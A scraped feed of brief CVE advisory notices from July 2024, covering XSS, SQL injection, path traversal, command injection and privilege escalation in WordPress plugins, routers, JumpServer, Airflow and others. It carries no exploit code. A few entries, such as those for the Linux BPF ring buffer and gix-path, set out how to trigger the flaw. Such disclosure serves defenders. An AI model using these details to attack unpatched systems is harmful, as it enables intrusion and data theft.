| 2024-07-20 09:37:40 |
🚨 CVE-2024-37953Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in MBE Worldwide S.P.A. MBE eShip allows Reflected XSS.This issue affects MBE eShip: from n/a through 2.1.2.🎖@cveNotify |
|
| 2024-07-20 09:37:37 |
🚨 CVE-2024-37951Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Noor alam Magical Posts Display – Elementor & Gutenberg Posts Blocks allows Stored XSS.This issue affects Magical Posts Display – Elementor & Gutenberg Posts Blocks: from n/a through 1.2.38.🎖@cveNotify |
|
| 2024-07-20 09:37:36 |
🚨 CVE-2024-37949Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CyberChimps Responsive Mobile allows Stored XSS.This issue affects Responsive Mobile: from n/a through 1.15.1.🎖@cveNotify |
|
| 2024-07-20 09:37:35 |
🚨 CVE-2024-37947Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Themeum Tutor LMS allows Stored XSS.This issue affects Tutor LMS: from n/a through 2.7.2.🎖@cveNotify |
|
| 2024-07-20 09:37:31 |
🚨 CVE-2024-37943Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in YITH YITH WooCommerce Ajax Product Filter allows Reflected XSS.This issue affects YITH WooCommerce Ajax Product Filter: from n/a through 5.1.0.🎖@cveNotify |
|
| 2024-07-20 09:37:30 |
🚨 CVE-2024-37922Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Leap13 Premium Addons for Elementor allows Stored XSS.This issue affects Premium Addons for Elementor: from n/a through 4.10.34.🎖@cveNotify |
|
| 2024-07-20 09:37:26 |
🚨 CVE-2024-37920Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Repute InfoSystems ARForms Form Builder allows Reflected XSS.This issue affects ARForms Form Builder: from n/a through 1.6.7.🎖@cveNotify |
|
| 2024-07-20 09:37:25 |
🚨 CVE-2024-37565Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TemeGUM Gum Elementor Addon allows Stored XSS.This issue affects Gum Elementor Addon: from n/a through 1.3.5.🎖@cveNotify |
|
| 2024-07-20 09:37:24 |
🚨 CVE-2024-37563Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TOCHAT.BE allows Stored XSS.This issue affects TOCHAT.BE: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-07-20 08:37:45 |
🚨 CVE-2024-38686Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Pluginic FancyPost – Best Ultimate Post Block, Post Grid, Layouts, Carousel, Slider For Gutenberg & Elementor allows Stored XSS.This issue affects FancyPost – Best Ultimate Post Block, Post Grid, Layouts, Carousel, Slider For Gutenberg & Elementor: from n/a through 5.3.1.🎖@cveNotify |
|
| 2024-07-20 08:37:44 |
🚨 CVE-2024-38685Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in SubscriptionPro WP Announcement allows Stored XSS.This issue affects WP Announcement: from n/a through 2.0.8.🎖@cveNotify |
|
| 2024-07-20 08:37:43 |
🚨 CVE-2024-38683Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in iThemelandCo WooCommerce Report allows Reflected XSS.This issue affects WooCommerce Report: from n/a through 1.4.5.🎖@cveNotify |
|
| 2024-07-20 08:37:42 |
🚨 CVE-2024-38682Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Techeshta Post Layouts for Gutenberg allows Stored XSS.This issue affects Post Layouts for Gutenberg: from n/a through 1.2.7.🎖@cveNotify |
|
| 2024-07-20 08:37:38 |
🚨 CVE-2024-38681Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Noor alam Magical Addons For Elementor allows Stored XSS.This issue affects Magical Addons For Elementor: from n/a through 1.1.41.🎖@cveNotify |
|
| 2024-07-20 08:37:37 |
🚨 CVE-2024-38678Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Calendar.Online Calendar.Online / Kalender.Digital allows Stored XSS.This issue affects Calendar.Online / Kalender.Digital: from n/a through 1.0.8.🎖@cveNotify |
|
| 2024-07-20 08:37:36 |
🚨 CVE-2024-38677Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Reviews.Co.Uk REVIEWS.Io allows Stored XSS.This issue affects REVIEWS.Io: from n/a through 1.2.7.🎖@cveNotify |
|
| 2024-07-20 08:37:32 |
🚨 CVE-2024-38675Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in LOOS,Inc. Arkhe Blocks allows Stored XSS.This issue affects Arkhe Blocks: from n/a through 2.22.1.🎖@cveNotify |
|
| 2024-07-20 08:37:31 |
🚨 CVE-2024-38673Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Obtain Infotech Multisite Content Copier/Updater allows Reflected XSS.This issue affects Multisite Content Copier/Updater: from n/a through 1.5.0.🎖@cveNotify |
|
| 2024-07-20 08:37:30 |
🚨 CVE-2024-38672Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in namithjawahar AdPush allows Reflected XSS.This issue affects AdPush: from n/a through 1.50.🎖@cveNotify |
|
| 2024-07-20 08:37:26 |
🚨 CVE-2024-38670Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Team Members allows Stored XSS.This issue affects Team Members: from n/a through 5.3.3.🎖@cveNotify |
|
| 2024-07-20 08:37:25 |
🚨 CVE-2024-37961Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in codoc.Jp allows Stored XSS.This issue affects codoc: from n/a through 0.9.51.12.🎖@cveNotify |
|
| 2024-07-20 08:37:24 |
🚨 CVE-2024-37960Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Chris Coyier CodePen Embedded Pens Shortcode allows Stored XSS.This issue affects CodePen Embedded Pens Shortcode: from n/a through 1.0.0.🎖@cveNotify |
|
| 2024-07-20 07:37:25 |
🚨 CVE-2024-6491The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mailchimp_api_key_manage function in all versions up to, and including, 2.0.10. This makes it possible for authenticated attackers, with Contributor-level access and above, to set the MailChimp API key.🎖@cveNotify |
|
| 2024-07-20 07:37:24 |
🚨 CVE-2024-6489The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_google_api_key function in all versions up to, and including, 2.0.10. This makes it possible for authenticated attackers, with Contributor-level access and above, to set the MailChimp API key.🎖@cveNotify |
|
| 2024-07-20 04:37:25 |
🚨 CVE-2024-40348An issue in the component /api/swaggerui/static of Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal.🎖@cveNotify |
|
| 2024-07-20 04:37:24 |
🚨 CVE-2024-3934The Mercado Pago payments for WooCommerce plugin for WordPress is vulnerable to Path Traversal in versions 7.3.0 to 7.5.1 via the mercadopagoDownloadLog function. This makes it possible for authenticated attackers, with subscriber-level access and above, to download and read the contents of arbitrary files on the server, which can contain sensitive information. The arbitrary file download was patched in 7.5.1, while the missing authorization was corrected in version 7.6.2.🎖@cveNotify |
|
| 2024-07-20 03:37:25 |
🚨 CVE-2024-6560The Addonify – Quick View For WooCommerce plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2.16. This is due the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-07-20 03:37:24 |
🚨 CVE-2024-2337The Easy Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'testimonials_grid ' shortcode in all versions up to, and including, 3.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-20 02:37:24 |
🚨 CVE-2024-5804The Conditional Fields for Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.13. This is due to missing or incorrect nonce validation on the wpcf7cf_admin_init function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-19 22:37:24 |
🚨 CVE-2024-35260An authenticated attacker can exploit an Untrusted Search Path vulnerability in Microsoft Dataverse to execute code over a network.🎖@cveNotify |
|
| 2024-07-19 21:37:24 |
🚨 CVE-2024-20652Windows HTML Platforms Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-19 21:07:24 |
🚨 CVE-2024-0865CWE-798: Use of hard-coded credentials vulnerability exists that could cause local privilegeescalation when logged in as a non-administrative user.🎖@cveNotify |
|
| 2024-07-19 20:37:32 |
🚨 CVE-2024-39906A command injection vulnerability was found in the IndieAuth functionality of the Ruby on Rails based Haven blog web application. The affected functionality requires authentication, but an attacker can craft a link that they can pass to a logged in administrator of the blog software. This leads to the immediate execution of the provided commands when the link is accessed by the authenticated administrator. This issue may lead to Remote Code Execution (RCE) and has been addressed by commit `c52f07c`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-19 20:37:25 |
🚨 CVE-2024-6205The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.🎖@cveNotify |
|
| 2024-07-19 20:37:24 |
🚨 CVE-2024-21377Windows DNS Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-07-19 20:07:25 |
🚨 CVE-2024-6903A vulnerability, which was classified as critical, has been found in SourceCodester Record Management System 1.0. Affected by this issue is some unknown functionality of the file sort1_user.php. The manipulation of the argument position leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271928.🎖@cveNotify |
|
| 2024-07-19 20:07:24 |
🚨 CVE-2024-6900A vulnerability was found in SourceCodester Record Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file edit_emp.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271925 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-19 19:07:35 |
🚨 CVE-2024-35338Tenda i29V1.0 V1.0.0.5 was discovered to contain a hardcoded password for root.🎖@cveNotify |
|
| 2024-07-19 19:07:31 |
🚨 CVE-2024-35264.NET and Visual Studio Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-19 19:07:30 |
🚨 CVE-2024-26279The wrapper extensions do not correctly validate inputs, leading to XSS vectors.🎖@cveNotify |
|
| 2024-07-19 19:07:26 |
🚨 CVE-2024-26278The Custom Fields component not correctly filter inputs, leading to a XSS vector.🎖@cveNotify |
|
| 2024-07-19 19:07:25 |
🚨 CVE-2024-4146In lunary-ai/lunary version v1.2.13, an improper authorization vulnerability exists that allows unauthorized users to access and manipulate projects within an organization they should not have access to. Specifically, the vulnerability is located in the `checkProjectAccess` method within the authorization middleware, which fails to adequately verify if a user has the correct permissions to access a specific project. Instead, it only checks if the user is part of the organization owning the project, overlooking the necessary check against the `account_project` table for explicit project access rights. This flaw enables attackers to gain complete control over all resources within a project, including the ability to create, update, read, and delete any resource, compromising the privacy and security of sensitive information.🎖@cveNotify |
|
| 2024-07-19 19:07:24 |
🚨 CVE-2024-35756Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CeiKay Tooltip CK tooltip-ck allows Stored XSS.This issue affects Tooltip CK: from n/a through 2.2.15.🎖@cveNotify |
|
| 2024-07-19 18:37:35 |
🚨 CVE-2024-5977The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.13.0 via the 'handleRequest' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with GiveWP Worker-level access and above, to delete and update arbitrary posts.🎖@cveNotify |
|
| 2024-07-19 18:37:31 |
🚨 CVE-2024-6398An information disclosure vulnerability in SWG in versions 12.x prior to 12.2.10 and 11.x prior to 11.2.24 allows information stored in a customizable block page to be disclosed to third-party websites due to Same Origin Policy Bypass of browsers in certain scenarios. The risk is low, because other recommended default security policies such as URL categorization and GTI are in place in most policies to block access to uncategorized/high risk websites. Any information disclosed depends on how the customers have customized the block pages.🎖@cveNotify |
|
| 2024-07-19 18:37:30 |
🚨 CVE-2024-37843Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.🎖@cveNotify |
|
| 2024-07-19 18:37:29 |
🚨 CVE-2024-36395Verint - CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)🎖@cveNotify |
|
| 2024-07-19 18:37:26 |
🚨 CVE-2024-34113ColdFusion versions 2023u7, 2021u13 and earlier are affected by a Weak Cryptography for Passwords vulnerability that could result in a security feature bypass. This vulnerability arises due to the use of insufficiently strong cryptographic algorithms or flawed implementation that compromises the confidentiality of password data. An attacker could exploit this weakness to decrypt or guess passwords, potentially gaining unauthorized access to protected resources. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-07-19 18:37:25 |
🚨 CVE-2024-35753Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TemplatesNext TemplatesNext OnePager allows Stored XSS.This issue affects TemplatesNext OnePager: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-07-19 18:07:30 |
🚨 CVE-2024-5402Unquoted Search Path or Element vulnerability in ABB Mint Workbench.A local attacker who successfully exploited this vulnerability could gain elevated privileges by inserting an executable file in the path of the affected service.This issue affects Mint Workbench I versions: from 5866 before 5868.🎖@cveNotify |
|
| 2024-07-19 18:07:26 |
🚨 CVE-2024-37224Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Smartypants SP Project & Document Manager allows Path Traversal.This issue affects SP Project & Document Manager: from n/a through 4.71.🎖@cveNotify |
|
| 2024-07-19 18:07:25 |
🚨 CVE-2024-34116Creative Cloud Desktop versions 6.1.0.587 and earlier are affected by an Uncontrolled Search Path Element vulnerability that could result in a security feature bypass. An attacker could exploit this vulnerability to load and execute malicious libraries, leading to arbitrary file delete. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2024-07-19 18:07:24 |
🚨 CVE-2024-34115Substance3D - Stager versions 2.1.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-07-19 17:07:25 |
🚨 CVE-2024-37471Cross Site Scripting (XSS) vulnerability in WofficeIO Woffice Core allows Reflected XSS.This issue affects Woffice Core: from n/a through 5.4.8.🎖@cveNotify |
|
| 2024-07-19 17:07:24 |
🚨 CVE-2024-37476Cross Site Scripting (XSS) vulnerability in Automattic Newspack Campaigns allows Stored XSS.This issue affects Newspack Campaigns: from n/a through 2.31.1.🎖@cveNotify |
|
| 2024-07-19 16:37:25 |
🚨 CVE-2024-37629SummerNote 0.8.18 is vulnerable to Cross Site Scripting (XSS) via the Code View Function.🎖@cveNotify |
|
| 2024-07-19 16:37:24 |
🚨 CVE-2024-5564A vulnerability was found in libndp. This flaw allows a local malicious user to cause a buffer overflow in NetworkManager, triggered by sending a malformed IPv6 router advertisement packet. This issue occurred as libndp was not correctly validating the route length information.🎖@cveNotify |
|
| 2024-07-19 16:07:30 |
🚨 CVE-2024-5582The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'url' attribute within the Q&A Block widget in all versions up to, and including, 1.33 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-19 16:07:26 |
🚨 CVE-2024-39877Apache Airflow 2.4.0, and versions before 2.9.3, has a vulnerability that allows authenticated DAG authors to craft a doc_md parameter in a way that could execute arbitrary code in the scheduler context, which should be forbidden according to the Airflow Security model. Users should upgrade to version 2.9.3 or later which has removed the vulnerability.🎖@cveNotify |
|
| 2024-07-19 16:07:25 |
🚨 CVE-2024-6660The BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the bookingpress_import_data_continue_process_func function in all versions up to, and including, 1.1.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site and upload arbitrary files. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.🎖@cveNotify |
|
| 2024-07-19 16:07:24 |
🚨 CVE-2024-6467The BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin plugin for WordPress is vulnerable to Arbitrary File Read to Arbitrary File Creation in all versions up to, and including, 1.1.5 via the 'bookingpress_save_lite_wizard_settings_func' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary files that contain the content of files on the server, allowing the execution of any PHP code in those files or the exposure of sensitive information.🎖@cveNotify |
|
| 2024-07-19 15:37:37 |
🚨 CVE-2024-6895Insufficient authentication in user account management in Yugabyte Platform allows local network attackers with a compromised user session to change critical security information without re-authentication. An attacker with user session and access to application can modify settings such as password and email without being prompted for the current password, enabling account takeover.🎖@cveNotify |
|
| 2024-07-19 15:37:36 |
🚨 CVE-2024-39962D-Link DIR-823X AX3000 Dual-Band Gigabit Wireless Router v21_D240126 was discovered to contain a remote code execution (RCE) vulnerability in the ntp_zone_val parameter at /goform/set_ntp. This vulnerability is exploited via a crafted HTTP request.🎖@cveNotify |
|
| 2024-07-19 15:37:35 |
🚨 CVE-2024-27489An issue in the DelFile() function of WMCMS v4.4 allows attackers to delete arbitrary files via a crafted POST request.🎖@cveNotify |
|
| 2024-07-19 15:37:32 |
🚨 CVE-2024-0006Information exposure in the logging system in Yugabyte Platform allows local attackers with access to application logs to obtain database user credentials in log files, potentially leading to unauthorized database access.🎖@cveNotify |
|
| 2024-07-19 15:37:31 |
🚨 CVE-2024-5254The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_info_banner shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-19 15:37:30 |
🚨 CVE-2024-5253The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ult_team shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-19 15:37:26 |
🚨 CVE-2024-5251The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_pricing shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-19 15:07:35 |
🚨 CVE-2024-41009In the Linux kernel, the following vulnerability has been resolved:bpf: Fix overrunning reservations in ringbufThe BPF ring buffer internally is implemented as a power-of-2 sized circularbuffer, with two logical and ever-increasing counters: consumer_pos is theconsumer counter to show which logical position the consumer consumed thedata, and producer_pos which is the producer counter denoting the amount ofdata reserved by all producers.Each time a record is reserved, the producer that "owns" the record willsuccessfully advance producer counter. In user space each time a record isread, the consumer of the data advanced the consumer counter once it finishedprocessing. Both counters are stored in separate pages so that from userspace, the producer counter is read-only and the consumer counter is read-write.One aspect that simplifies and thus speeds up the implementation of bothproducers and consumers is how the data area is mapped twice contiguouslyback-to-back in the virtual memory, allowing to not take any special measuresfor samples that have to wrap around at the end of the circular buffer dataarea, because the next page after the last data page would be first data pageagain, and thus the sample will still appear completely contiguous in virtualmemory.Each record has a struct bpf_ringbuf_hdr { u32 len; u32 pg_off; } header forbook-keeping the length and offset, and is inaccessible to the BPF program.Helpers like bpf_ringbuf_reserve() return `(void *)hdr + BPF_RINGBUF_HDR_SZ`for the BPF program to use. Bing-Jhong and Muhammad reported that it is howeverpossible to make a second allocated memory chunk overlapping with the firstchunk and as a result, the BPF program is now able to edit first chunk'sheader.For example, consider the creation of a BPF_MAP_TYPE_RINGBUF map with sizeof 0x4000. Next, the consumer_pos is modified to 0x3000 /before/ a call tobpf_ringbuf_reserve() is made. This will allocate a chunk A, which is in[0x0,0x3008], and the BPF program is able to edit [0x8,0x3008]. Now, letsallocate a chunk B with size 0x3000. This will succeed because consumer_poswas edited ahead of time to pass the `new_prod_pos - cons_pos > rb->mask`check. Chunk B will be in range [0x3008,0x6010], and the BPF program is ableto edit [0x3010,0x6010]. Due to the ring buffer memory layout mentionedearlier, the ranges [0x0,0x4000] and [0x4000,0x8000] point to the same datapages. This means that chunk B at [0x4000,0x4008] is chunk A's header.bpf_ringbuf_submit() / bpf_ringbuf_discard() use the header's pg_off to thenlocate the bpf_ringbuf itself via bpf_ringbuf_restore_from_rec(). Once chunkB modified chunk A's header, then bpf_ringbuf_commit() refers to the wrongpage and could cause a crash.Fix it by calculating the oldest pending_pos and check whether the rangefrom the oldest outstanding record to the newest would span beyond the ringbuffer size. If that is the case, then reject the request. We've tested withthe ring buffer benchmark in BPF selftests (./benchs/run_bench_ringbufs.sh)before/after the fix and while it seems a bit slower on some benchmarks, itis still not significantly enough to matter.🎖@cveNotify |
|
| 2024-07-19 15:07:31 |
🚨 CVE-2024-6803A vulnerability has been found in itsourcecode Document Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file insert.php. The manipulation of the argument anothercont leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271705 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-19 15:07:30 |
🚨 CVE-2024-6802A vulnerability, which was classified as critical, was found in SourceCodester Computer Laboratory Management System 1.0. Affected is an unknown function of the file /lms/classes/Master.php?f=save_record. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271704.🎖@cveNotify |
|
| 2024-07-19 15:07:26 |
🚨 CVE-2024-6595An issue was discovered in GitLab CE/EE affecting all versions starting from 11.8 prior to 16.11.6, starting from 17.0 prior to 17.0.4, and starting from 17.1 prior to 17.1.2 where it was possible to upload an NPM package with conflicting package data.🎖@cveNotify |
|
| 2024-07-19 15:07:25 |
🚨 CVE-2024-6008A vulnerability, which was classified as critical, was found in itsourcecode Online Book Store up to 1.0. Affected is an unknown function of the file /edit_book.php. The manipulation of the argument image leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268698 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-19 15:07:24 |
🚨 CVE-2024-37882Nextcloud Server is a self hosted personal cloud system. A recipient of a share with read&share permissions could reshare the item with more permissions. It is recommended that the Nextcloud Server is upgraded to 26.0.13 or 27.1.8 or 28.0.4 and that the Nextcloud Enterprise Server is upgraded to 26.0.13 or 27.1.8 or 28.0.4.🎖@cveNotify |
|
| 2024-07-19 14:37:25 |
🚨 CVE-2016-3751Unspecified vulnerability in libpng before 1.6.20, as used in Android 4.x before 4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-07-01, allows attackers to gain privileges via a crafted application, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 23265085.🎖@cveNotify |
|
| 2024-07-19 14:37:24 |
🚨 CVE-2015-0973Buffer overflow in the png_read_IDAT_data function in pngrutil.c in libpng before 1.5.21 and 1.6.x before 1.6.16 allows context-dependent attackers to execute arbitrary code via IDAT data with a large width, a different vulnerability than CVE-2014-9495.🎖@cveNotify |
|
| 2024-07-19 13:07:41 |
🚨 CVE-2024-40644gitoxide An idiomatic, lean, fast & safe pure Rust implementation of Git. `gix-path` can be tricked into running another `git.exe` placed in an untrusted location by a limited user account on Windows systems. Windows permits limited user accounts without administrative privileges to create new directories in the root of the system drive. While `gix-path` first looks for `git` using a `PATH` search, in version 0.10.8 it also has a fallback strategy on Windows of checking two hard-coded paths intended to be the 64-bit and 32-bit Program Files directories. Existing functions, as well as the newly introduced `exe_invocation` function, were updated to make use of these alternative locations. This causes facilities in `gix_path::env` to directly execute `git.exe` in those locations, as well as to return its path or whatever configuration it reports to callers who rely on it. Although unusual setups where the system drive is not `C:`, or even where Program Files directories have non-default names, are technically possible, the main problem arises on a 32-bit Windows system. Such a system has no `C:\Program Files (x86)` directory. A limited user on a 32-bit Windows system can therefore create the `C:\Program Files (x86)` directory and populate it with arbitrary contents. Once a payload has been placed at the second of the two hard-coded paths in this way, other user accounts including administrators will execute it if they run an application that uses `gix-path` and do not have `git` in a `PATH` directory. (While having `git` found in a `PATH` search prevents exploitation, merely having it installed in the default location under the real `C:\Program Files` directory does not. This is because the first hard-coded path's `mingw64` component assumes a 64-bit installation.). Only Windows is affected. Exploitation is unlikely except on a 32-bit system. In particular, running a 32-bit build on a 64-bit system is not a risk factor. Furthermore, the attacker must have a user account on the system, though it may be a relatively unprivileged account. Such a user can perform privilege escalation and execute code as another user, though it may be difficult to do so reliably because the targeted user account must run an application or service that uses `gix-path` and must not have `git` in its `PATH`. The main exploitable configuration is one where Git for Windows has been installed but not added to `PATH`. This is one of the options in its installer, though not the default option. Alternatively, an affected program that sanitizes its `PATH` to remove seemingly nonessential directories could allow exploitation. But for the most part, if the target user has configured a `PATH` in which the real `git.exe` can be found, then this cannot be exploited. This issue has been addressed in release version 0.10.9 and all users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-19 13:07:40 |
🚨 CVE-2024-40629JumpServer is an open-source Privileged Access Management (PAM) tool that provides DevOps and IT teams with on-demand and secure access to SSH, RDP, Kubernetes, Database and RemoteApp endpoints through a web browser. An attacker can exploit the Ansible playbook to write arbitrary files, leading to remote code execution (RCE) in the Celery container. The Celery container runs as root and has database access, allowing an attacker to steal all secrets for hosts, create a new JumpServer account with admin privileges, or manipulate the database in other ways. This issue has been patched in release versions 3.10.12 and 4.0.0. It is recommended to upgrade the safe versions. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-19 13:07:37 |
🚨 CVE-2024-40628JumpServer is an open-source Privileged Access Management (PAM) tool that provides DevOps and IT teams with on-demand and secure access to SSH, RDP, Kubernetes, Database and RemoteApp endpoints through a web browser. An attacker can exploit the ansible playbook to read arbitrary files in the celery container, leading to sensitive information disclosure. The Celery container runs as root and has database access, allowing the attacker to steal all secrets for hosts, create a new JumpServer account with admin privileges, or manipulate the database in other ways. This issue has been addressed in release versions 3.10.12 and 4.0.0. It is recommended to upgrade the safe versions. There is no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-19 13:07:36 |
🚨 CVE-2023-40539Philips Vue PACS does not require that users have strong passwords, which could make it easier for attackers to compromise user accounts.🎖@cveNotify |
|
| 2024-07-19 13:07:35 |
🚨 CVE-2023-40159A validated user not explicitly authorized to have access to certain sensitive information could access Philips Vue PACS on the same network to expose that information.🎖@cveNotify |
|
| 2024-07-19 13:07:31 |
🚨 CVE-2024-38302Dell Data Lakehouse, version(s) 1.0.0.0, contain(s) a Missing Encryption of Sensitive Data vulnerability in the DDAE (Starburst). A low privileged attacker with adjacent network access could potentially exploit this vulnerability, leading to Information disclosure.🎖@cveNotify |
|
| 2024-07-19 13:07:30 |
🚨 CVE-2023-50304IBM Engineering Requirements Management DOORS Web Access 9.7.2.8 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 273335.🎖@cveNotify |
|
| 2024-07-19 13:07:26 |
🚨 CVE-2024-31143An optional feature of PCI MSI called "Multiple Message" allows adevice to use multiple consecutive interrupt vectors. Unlike for MSI-X,the setting up of these consecutive vectors needs to happen all in onego. In this handling an error path could be taken in differentsituations, with or without a particular lock held. This error pathwrongly releases the lock even when it is not currently held.🎖@cveNotify |
|
| 2024-07-19 13:07:25 |
🚨 CVE-2007-6353Integer overflow in exif.cpp in exiv2 library allows context-dependent attackers to execute arbitrary code via a crafted EXIF file that triggers a heap-based buffer overflow.🎖@cveNotify |
|
| 2024-07-19 12:37:24 |
🚨 CVE-2024-37066A command injection vulnerability exists in Wyze V4 Pro firmware versions before 4.50.4.9222, which allows attackers to execute arbitrary commands over Bluetooth as root during the camera setup process.🎖@cveNotify |
|
| 2024-07-19 11:37:26 |
🚨 CVE-2024-6916A vulnerability in Zowe CLI allows local, privileged actors to display securely stored properties in cleartext within a terminal using the '--show-inputs-only' flag.🎖@cveNotify |
|
| 2024-07-19 11:37:25 |
